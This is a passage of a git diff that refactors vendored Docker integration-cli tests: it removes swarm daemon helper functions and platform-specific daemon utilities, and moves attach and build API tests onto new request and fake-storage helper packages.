nil { - return err - } - d.Info = info - return nil -} - -// Leave forces daemon to leave current cluster. -func (d *SwarmDaemon) Leave(force bool) error { - url := "/swarm/leave" - if force { - url += "?force=1" - } - status, out, err := d.SockRequest("POST", url, nil) - if status != http.StatusOK { - return fmt.Errorf("leaving swarm: invalid statuscode %v, %q", status, out) - } - if err != nil { - err = fmt.Errorf("leaving swarm: %v", err) - } - return err -} - -func (d *SwarmDaemon) info() (swarm.Info, error) { - var info struct { - Swarm swarm.Info - } - status, dt, err := d.SockRequest("GET", "/info", nil) - if status != http.StatusOK { - return info.Swarm, fmt.Errorf("get swarm info: invalid statuscode %v", status) - } - if err != nil { - return info.Swarm, fmt.Errorf("get swarm info: %v", err) - } - if err := json.Unmarshal(dt, &info); err != nil { - return info.Swarm, err - } - return info.Swarm, nil -} - -type serviceConstructor func(*swarm.Service) -type nodeConstructor func(*swarm.Node) -type specConstructor func(*swarm.Spec) - -func (d *SwarmDaemon) createService(c *check.C, f ...serviceConstructor) string { - var service swarm.Service - for _, fn := range f { - fn(&service) - } - status, out, err := d.SockRequest("POST", "/services/create", service.Spec) - - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out))) - - var scr types.ServiceCreateResponse - c.Assert(json.Unmarshal(out, &scr), checker.IsNil) - return scr.ID -} - -func (d *SwarmDaemon) getService(c *check.C, id string) *swarm.Service { - var service swarm.Service - status, out, err := d.SockRequest("GET", "/services/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &service), checker.IsNil) - return &service -} - -func (d *SwarmDaemon) getServiceTasks(c *check.C, service string) []swarm.Task { - var tasks []swarm.Task - - filterArgs := filters.NewArgs() - filterArgs.Add("desired-state", "running") - filterArgs.Add("service", service) - filters, err := filters.ToParam(filterArgs) - c.Assert(err, checker.IsNil) - - status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &tasks), checker.IsNil) - return tasks -} - -func (d *SwarmDaemon) checkServiceTasksInState(service string, state swarm.TaskState, message string) func(*check.C) (interface{}, check.CommentInterface) { - return func(c *check.C) (interface{}, check.CommentInterface) { - tasks := d.getServiceTasks(c, service) - var count int - for _, task := range tasks { - if task.Status.State == state { - if message == "" || strings.Contains(task.Status.Message, message) { - count++ - } - } - } - return count, nil - } -} - -func (d *SwarmDaemon) checkServiceRunningTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { - return d.checkServiceTasksInState(service, swarm.TaskStateRunning, "") -} - -func (d *SwarmDaemon) checkServiceUpdateState(service string) func(*check.C) (interface{}, check.CommentInterface) { - return func(c *check.C) (interface{}, check.CommentInterface) { - service := d.getService(c, service) - return service.UpdateStatus.State, nil - } -} - -func (d *SwarmDaemon) checkServiceTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { - return func(c *check.C) (interface{}, check.CommentInterface) { - tasks := d.getServiceTasks(c, service) - return len(tasks), nil - } -} - -func (d *SwarmDaemon) checkRunningTaskImages(c *check.C) (interface{}, check.CommentInterface) { - var tasks []swarm.Task - - filterArgs := filters.NewArgs() - filterArgs.Add("desired-state", "running") - filters, err := filters.ToParam(filterArgs) - c.Assert(err, checker.IsNil) - - status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &tasks), checker.IsNil) - - result := make(map[string]int) - for _, task := range tasks { - if task.Status.State == swarm.TaskStateRunning { - result[task.Spec.ContainerSpec.Image]++ - } - } - return result, nil -} - -func (d *SwarmDaemon) checkNodeReadyCount(c *check.C) (interface{}, check.CommentInterface) { - nodes := d.listNodes(c) - var readyCount int - for _, node := range nodes { - if node.Status.State == swarm.NodeStateReady { - readyCount++ - } - } - return readyCount, nil -} - -func (d *SwarmDaemon) getTask(c *check.C, id string) swarm.Task { - var task swarm.Task - - status, out, err := d.SockRequest("GET", "/tasks/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &task), checker.IsNil) - return task -} - -func (d *SwarmDaemon) updateService(c *check.C, service *swarm.Service, f ...serviceConstructor) { - for _, fn := range f { - fn(service) - } - url := fmt.Sprintf("/services/%s/update?version=%d", service.ID, service.Version.Index) - status, out, err := d.SockRequest("POST", url, service.Spec) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) removeService(c *check.C, id string) { - status, out, err := d.SockRequest("DELETE", "/services/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) getNode(c *check.C, id string) *swarm.Node { - var node swarm.Node - status, out, err := d.SockRequest("GET", "/nodes/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &node), checker.IsNil) - c.Assert(node.ID, checker.Equals, id) - return &node -} - -func (d *SwarmDaemon) removeNode(c *check.C, id string, force bool) { - url := "/nodes/" + id - if force { - url += "?force=1" - } - - status, out, err := d.SockRequest("DELETE", url, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) updateNode(c *check.C, id string, f ...nodeConstructor) { - for i := 0; ; i++ { - node := d.getNode(c, id) - for _, fn := range f { - fn(node) - } - url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index) - status, out, err := d.SockRequest("POST", url, node.Spec) - if i < 10 && strings.Contains(string(out), "update out of sequence") { - time.Sleep(100 * time.Millisecond) - continue - } - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - return - } -} - -func (d *SwarmDaemon) listNodes(c *check.C) []swarm.Node { - status, out, err := d.SockRequest("GET", "/nodes", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - - nodes := []swarm.Node{} - c.Assert(json.Unmarshal(out, &nodes), checker.IsNil) - return nodes -} - -func (d *SwarmDaemon) listServices(c *check.C) []swarm.Service { - status, out, err := d.SockRequest("GET", "/services", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - - services := []swarm.Service{} - c.Assert(json.Unmarshal(out, &services), checker.IsNil) - return services -} - -func (d *SwarmDaemon) createSecret(c *check.C, secretSpec swarm.SecretSpec) string { - status, out, err := d.SockRequest("POST", "/secrets/create", secretSpec) - - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out))) - - var scr types.SecretCreateResponse - c.Assert(json.Unmarshal(out, &scr), checker.IsNil) - return scr.ID -} - -func (d *SwarmDaemon) listSecrets(c *check.C) []swarm.Secret { - status, out, err := d.SockRequest("GET", "/secrets", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - - secrets := []swarm.Secret{} - c.Assert(json.Unmarshal(out, &secrets), checker.IsNil) - return secrets -} - -func (d *SwarmDaemon) getSecret(c *check.C, id string) *swarm.Secret { - var secret swarm.Secret - status, out, err := d.SockRequest("GET", "/secrets/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &secret), checker.IsNil) - return &secret -} - -func (d *SwarmDaemon) deleteSecret(c *check.C, id string) { - status, out, err := d.SockRequest("DELETE", "/secrets/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) getSwarm(c *check.C) swarm.Swarm { - var sw swarm.Swarm - status, out, err := d.SockRequest("GET", "/swarm", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &sw), checker.IsNil) - return sw -} - -func (d *SwarmDaemon) updateSwarm(c *check.C, f ...specConstructor) { - sw := d.getSwarm(c) - for _, fn := range f { - fn(&sw.Spec) - } - url := fmt.Sprintf("/swarm/update?version=%d", sw.Version.Index) - status, out, err := d.SockRequest("POST", url, sw.Spec) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) rotateTokens(c *check.C) { - var sw swarm.Swarm - status, out, err := d.SockRequest("GET", "/swarm", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &sw), checker.IsNil) - - url := fmt.Sprintf("/swarm/update?version=%d&rotateWorkerToken=true&rotateManagerToken=true", sw.Version.Index) - status, out, err = d.SockRequest("POST", url, sw.Spec) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) joinTokens(c *check.C) swarm.JoinTokens { - var sw swarm.Swarm - status, out, err := d.SockRequest("GET", "/swarm", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &sw), checker.IsNil) - return sw.JoinTokens -} - -func (d *SwarmDaemon) checkLocalNodeState(c *check.C) (interface{}, check.CommentInterface) { - info, err := d.info() - c.Assert(err, checker.IsNil) - return info.LocalNodeState, nil -} - -func (d *SwarmDaemon) checkControlAvailable(c *check.C) (interface{}, check.CommentInterface) { - info, err := d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - return info.ControlAvailable, nil -} - -func (d *SwarmDaemon) checkLeader(c *check.C) (interface{}, check.CommentInterface) { - errList := check.Commentf("could not get node list") - status, out, err := d.SockRequest("GET", "/nodes", nil) - if err != nil { - return err, errList - } - if status != http.StatusOK { - return fmt.Errorf("expected http status OK, got: %d", status), errList - } - - var ls []swarm.Node - if err := json.Unmarshal(out, &ls); err != nil { - return err, errList - } - - for _, node := range ls { - if node.ManagerStatus != nil && node.ManagerStatus.Leader { - return nil, nil - } - } - return fmt.Errorf("no leader"), check.Commentf("could not find leader") -} - -func (d *SwarmDaemon) cmdRetryOutOfSequence(args ...string) (string, error) { - for i := 0; ; i++ { - out, err := d.Cmd(args...) - if err != nil { - if strings.Contains(out, "update out of sequence") { - if i < 10 { - continue - } - } - } - return out, err - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack_test.go similarity index 77% rename from vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go rename to vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack_test.go index 0cea901420..7a23e84bfc 100644 --- a/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go +++ b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack_test.go @@ -1,12 +1,15 @@ package main -import "github.com/go-check/check" +import ( + "github.com/docker/docker/integration-cli/daemon" + "github.com/go-check/check" +) -func (s *DockerSwarmSuite) getDaemon(c *check.C, nodeID string) *SwarmDaemon { +func (s *DockerSwarmSuite) getDaemon(c *check.C, nodeID string) *daemon.Daemon { s.daemonsLock.Lock() defer s.daemonsLock.Unlock() for _, d := range s.daemons { - if d.NodeID == nodeID { + if d.NodeID() == nodeID { return d } } diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_unix.go b/vendor/github.com/docker/docker/integration-cli/daemon_unix.go deleted file mode 100644 index 6ca7daf21c..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/daemon_unix.go +++ /dev/null @@ -1,35 +0,0 @@ -// +build !windows - -package main - -import ( - "os" - "path/filepath" - "syscall" - - "github.com/go-check/check" -) - -func cleanupExecRoot(c *check.C, execRoot string) { - // Cleanup network namespaces in the exec root of this - // daemon because this exec root is specific to this - // daemon instance and has no chance of getting - // cleaned up when a new daemon is instantiated with a - // new exec root. - netnsPath := filepath.Join(execRoot, "netns") - filepath.Walk(netnsPath, func(path string, info os.FileInfo, err error) error { - if err := syscall.Unmount(path, syscall.MNT_FORCE); err != nil { - c.Logf("unmount of %s failed: %v", path, err) - } - os.Remove(path) - return nil - }) -} - -func signalDaemonDump(pid int) { - syscall.Kill(pid, syscall.SIGQUIT) -} - -func signalDaemonReload(pid int) error { - return syscall.Kill(pid, syscall.SIGHUP) -} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_windows.go b/vendor/github.com/docker/docker/integration-cli/daemon_windows.go deleted file mode 100644 index 885b703b33..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/daemon_windows.go +++ /dev/null @@ -1,53 +0,0 @@ -package main - -import ( - "fmt" - "strconv" - "syscall" - "unsafe" - - "github.com/go-check/check" - "golang.org/x/sys/windows" -) - -func openEvent(desiredAccess uint32, inheritHandle bool, name string, proc *windows.LazyProc) (handle syscall.Handle, err error) { - namep, _ := syscall.UTF16PtrFromString(name) - var _p2 uint32 - if inheritHandle { - _p2 = 1 - } - r0, _, e1 := proc.Call(uintptr(desiredAccess), uintptr(_p2), uintptr(unsafe.Pointer(namep))) - handle = syscall.Handle(r0) - if handle == syscall.InvalidHandle { - err = e1 - } - return -} - -func pulseEvent(handle syscall.Handle, proc *windows.LazyProc) (err error) { - r0, _, _ := proc.Call(uintptr(handle)) - if r0 != 0 { - err = syscall.Errno(r0) - } - return -} - -func signalDaemonDump(pid int) { - modkernel32 := windows.NewLazySystemDLL("kernel32.dll") - procOpenEvent := modkernel32.NewProc("OpenEventW") - procPulseEvent := modkernel32.NewProc("PulseEvent") - - ev := "Global\\docker-daemon-" + strconv.Itoa(pid) - h2, _ := openEvent(0x0002, false, ev, procOpenEvent) - if h2 == 0 { - return - } - pulseEvent(h2, procPulseEvent) -} - -func signalDaemonReload(pid int) error { - return fmt.Errorf("daemon reload not supported") -} - -func cleanupExecRoot(c *check.C, execRoot string) { -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go index d43bf3ab0e..26633841db 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go @@ -4,17 +4,21 @@ import ( "bufio" "bytes" "context" + "fmt" "io" "net" "net/http" + "net/http/httputil" "strings" "time" "github.com/docker/docker/api/types" "github.com/docker/docker/client" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/docker/docker/pkg/stdcopy" "github.com/go-check/check" + "github.com/pkg/errors" "golang.org/x/net/websocket" ) @@ -22,7 +26,7 @@ func (s *DockerSuite) TestGetContainersAttachWebsocket(c *check.C) { testRequires(c, DaemonIsLinux) out, _ := dockerCmd(c, "run", "-dit", "busybox", "cat") - rwc, err := sockConn(time.Duration(10*time.Second), "") + rwc, err := request.SockConn(time.Duration(10*time.Second), daemonHost()) c.Assert(err, checker.IsNil) cleanedContainerID := strings.TrimSpace(out) @@ -72,26 +76,24 @@ func (s *DockerSuite) TestGetContainersAttachWebsocket(c *check.C) { // regression gh14320 func (s *DockerSuite) TestPostContainersAttachContainerNotFound(c *check.C) { - req, client, err := newRequestClient("POST", "/containers/doesnotexist/attach", nil, "", "") + resp, _, err := request.Post("/containers/doesnotexist/attach") c.Assert(err, checker.IsNil) - - resp, err := client.Do(req) // connection will shutdown, err should be "persistent connection closed" - c.Assert(err, checker.NotNil) // Server shutdown connection - - body, err := readBody(resp.Body) - c.Assert(err, checker.IsNil) c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound) + content, err := request.ReadBody(resp.Body) + c.Assert(err, checker.IsNil) expected := "No such container: doesnotexist\r\n" - c.Assert(string(body), checker.Equals, expected) + c.Assert(string(content), checker.Equals, expected) } func (s *DockerSuite) TestGetContainersWsAttachContainerNotFound(c *check.C) { - status, body, err := sockRequest("GET", "/containers/doesnotexist/attach/ws", nil) - c.Assert(status, checker.Equals, http.StatusNotFound) + res, body, err := request.Get("/containers/doesnotexist/attach/ws") + c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound) + c.Assert(err, checker.IsNil) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) expected := "No such container: doesnotexist" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + c.Assert(getErrorMessage(c, b), checker.Contains, expected) } func (s *DockerSuite) TestPostContainersAttach(c *check.C) { @@ -139,12 +141,12 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) { cid, _ := dockerCmd(c, "run", "-di", "busybox", "cat") cid = strings.TrimSpace(cid) // Attach to the container's stdout stream. - conn, br, err := sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + conn, br, err := sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) // Check if the data from stdout can be received. expectSuccess(conn, br, "stdout", false) // Attach to the container's stderr stream. - conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) // Since the container only emits stdout, attaching to stderr should return nothing. expectTimeout(conn, br, "stdout") @@ -152,10 +154,10 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) { // Test the similar functions of the stderr stream. cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "cat >&2") cid = strings.TrimSpace(cid) - conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) expectSuccess(conn, br, "stderr", false) - conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) expectTimeout(conn, br, "stderr") @@ -163,29 +165,32 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) { cid, _ = dockerCmd(c, "run", "-dit", "busybox", "/bin/sh", "-c", "cat >&2") cid = strings.TrimSpace(cid) // Attach to stdout only. - conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) expectSuccess(conn, br, "stdout", true) // Attach without stdout stream. - conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) // Nothing should be received because both the stdout and stderr of the container will be // sent to the client as stdout when tty is enabled. expectTimeout(conn, br, "stdout") // Test the client API - // Make sure we don't see "hello" if Logs is false client, err := client.NewEnvClient() c.Assert(err, checker.IsNil) + defer client.Close() cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "echo hello; cat") cid = strings.TrimSpace(cid) + // Make sure we don't see "hello" if Logs is false attachOpts := types.ContainerAttachOptions{ Stream: true, Stdin: true, Stdout: true, + Stderr: true, + Logs: false, } resp, err := client.ContainerAttach(context.Background(), cid, attachOpts) @@ -203,8 +208,53 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) { _, err = resp.Conn.Write([]byte("success")) c.Assert(err, checker.IsNil) - actualStdout := new(bytes.Buffer) - actualStderr := new(bytes.Buffer) - stdcopy.StdCopy(actualStdout, actualStderr, resp.Reader) - c.Assert(actualStdout.Bytes(), checker.DeepEquals, []byte("hello\nsuccess"), check.Commentf("Attach didn't return the expected data from stdout")) + var outBuf, errBuf bytes.Buffer + _, err = stdcopy.StdCopy(&outBuf, &errBuf, resp.Reader) + if err != nil && errors.Cause(err).(net.Error).Timeout() { + // ignore the timeout error as it is expected + err = nil + } + c.Assert(err, checker.IsNil) + c.Assert(errBuf.String(), checker.Equals, "") + c.Assert(outBuf.String(), checker.Equals, "hello\nsuccess") +} + +// SockRequestHijack creates a connection to specified host (with method, contenttype, …) and returns a hijacked connection +// and the output as a `bufio.Reader` +func sockRequestHijack(method, endpoint string, data io.Reader, ct string, daemon string, modifiers ...func(*http.Request)) (net.Conn, *bufio.Reader, error) { + req, client, err := newRequestClient(method, endpoint, data, ct, daemon, modifiers...) + if err != nil { + return nil, nil, err + } + + client.Do(req) + conn, br := client.Hijack() + return conn, br, nil +} + +// FIXME(vdemeester) httputil.ClientConn is deprecated, use http.Client instead (closer to actual client) +// Deprecated: Use New instead of NewRequestClient +// Deprecated: use request.Do (or Get, Delete, Post) instead +func newRequestClient(method, endpoint string, data io.Reader, ct, daemon string, modifiers ...func(*http.Request)) (*http.Request, *httputil.ClientConn, error) { + c, err := request.SockConn(time.Duration(10*time.Second), daemon) + if err != nil { + return nil, nil, fmt.Errorf("could not dial docker daemon: %v", err) + } + + client := httputil.NewClientConn(c, nil) + + req, err := http.NewRequest(method, endpoint, data) + if err != nil { + client.Close() + return nil, nil, fmt.Errorf("could not create new request: %v", err) + } + + for _, opt := range modifiers { + opt(req) + } + + if ct != "" { + req.Header.Set("Content-Type", ct) + } + return req, client, nil } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go deleted file mode 100644 index bfcae31bd0..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go +++ /dev/null @@ -1,25 +0,0 @@ -package main - -import ( - "net/http" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// Test case for #22244 -func (s *DockerSuite) TestAuthAPI(c *check.C) { - testRequires(c, Network) - config := types.AuthConfig{ - Username: "no-user", - Password: "no-password", - } - - expected := "Get https://registry-1.docker.io/v2/: unauthorized: incorrect username or password" - status, body, err := sockRequest("POST", "/auth", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusUnauthorized) - msg := getErrorMessage(c, body) - c.Assert(msg, checker.Contains, expected, check.Commentf("Expected: %v, got: %v", expected, msg)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go index 9b069a43a6..144acbd046 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go @@ -3,44 +3,54 @@ package main import ( "archive/tar" "bytes" + "context" + "encoding/json" + "fmt" + "io" + "io/ioutil" "net/http" "regexp" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/fakegit" + "github.com/docker/docker/internal/test/fakestorage" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func (s *DockerSuite) TestBuildAPIDockerFileRemote(c *check.C) { testRequires(c, NotUserNamespace) + var testD string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { testD = `FROM busybox -COPY * /tmp/ RUN find / -name ba* RUN find /tmp/` } else { // -xdev is required because sysfs can cause EPERM testD = `FROM busybox -COPY * /tmp/ RUN find / -xdev -name ba* RUN find /tmp/` } - server, err := fakeStorage(map[string]string{"testD": testD}) - c.Assert(err, checker.IsNil) + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{"testD": testD})) defer server.Close() - res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+server.URL()+"/testD", nil, "application/json") + res, body, err := request.Post("/build?dockerfile=baz&remote="+server.URL()+"/testD", request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - buf, err := readBody(body) + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) // Make sure Dockerfile exists. // Make sure 'baz' doesn't exist ANYWHERE despite being mentioned in the URL out := string(buf) - c.Assert(out, checker.Contains, "/tmp/Dockerfile") + c.Assert(out, checker.Contains, "RUN find /tmp") c.Assert(out, checker.Not(checker.Contains), "baz") } @@ -64,14 +74,12 @@ func (s *DockerSuite) TestBuildAPIRemoteTarballContext(c *check.C) { // failed to close tar archive c.Assert(tw.Close(), checker.IsNil) - server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{ "testT.tar": buffer, - }) - c.Assert(err, checker.IsNil) - + })) defer server.Close() - res, b, err := sockRequestRaw("POST", "/build?remote="+server.URL()+"/testT.tar", nil, "application/tar") + res, b, err := request.Post("/build?remote="+server.URL()+"/testT.tar", request.ContentType("application/tar")) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) b.Close() @@ -113,19 +121,18 @@ RUN echo 'right' // failed to close tar archive c.Assert(tw.Close(), checker.IsNil) - server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{ "testT.tar": buffer, - }) - c.Assert(err, checker.IsNil) - + })) defer server.Close() + url := "/build?dockerfile=custom&remote=" + server.URL() + "/testT.tar" - res, body, err := sockRequestRaw("POST", url, nil, "application/tar") + res, body, err := request.Post(url, request.ContentType("application/tar")) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) defer body.Close() - content, err := readBody(body) + content, err := request.ReadBody(body) c.Assert(err, checker.IsNil) // Build used the wrong dockerfile. @@ -133,18 +140,17 @@ RUN echo 'right' } func (s *DockerSuite) TestBuildAPILowerDockerfile(c *check.C) { - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "dockerfile": `FROM busybox RUN echo from dockerfile`, }, false) - c.Assert(err, checker.IsNil) defer git.Close() - res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json") + res, body, err := request.Post("/build?remote="+git.RepoURL, request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - buf, err := readBody(body) + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) out := string(buf) @@ -152,21 +158,20 @@ RUN echo from dockerfile`, } func (s *DockerSuite) TestBuildAPIBuildGitWithF(c *check.C) { - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "baz": `FROM busybox RUN echo from baz`, "Dockerfile": `FROM busybox RUN echo from Dockerfile`, }, false) - c.Assert(err, checker.IsNil) defer git.Close() // Make sure it tries to 'dockerfile' query param value - res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+git.RepoURL, nil, "application/json") + res, body, err := request.Post("/build?dockerfile=baz&remote="+git.RepoURL, request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - buf, err := readBody(body) + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) out := string(buf) @@ -175,21 +180,20 @@ RUN echo from Dockerfile`, func (s *DockerSuite) TestBuildAPIDoubleDockerfile(c *check.C) { testRequires(c, UnixCli) // dockerfile overwrites Dockerfile on Windows - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "Dockerfile": `FROM busybox RUN echo from Dockerfile`, "dockerfile": `FROM busybox RUN echo from dockerfile`, }, false) - c.Assert(err, checker.IsNil) defer git.Close() // Make sure it tries to 'dockerfile' query param value - res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json") + res, body, err := request.Post("/build?remote="+git.RepoURL, request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - buf, err := readBody(body) + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) out := string(buf) @@ -232,11 +236,11 @@ func (s *DockerSuite) TestBuildAPIUnnormalizedTarPaths(c *check.C) { // failed to close tar archive 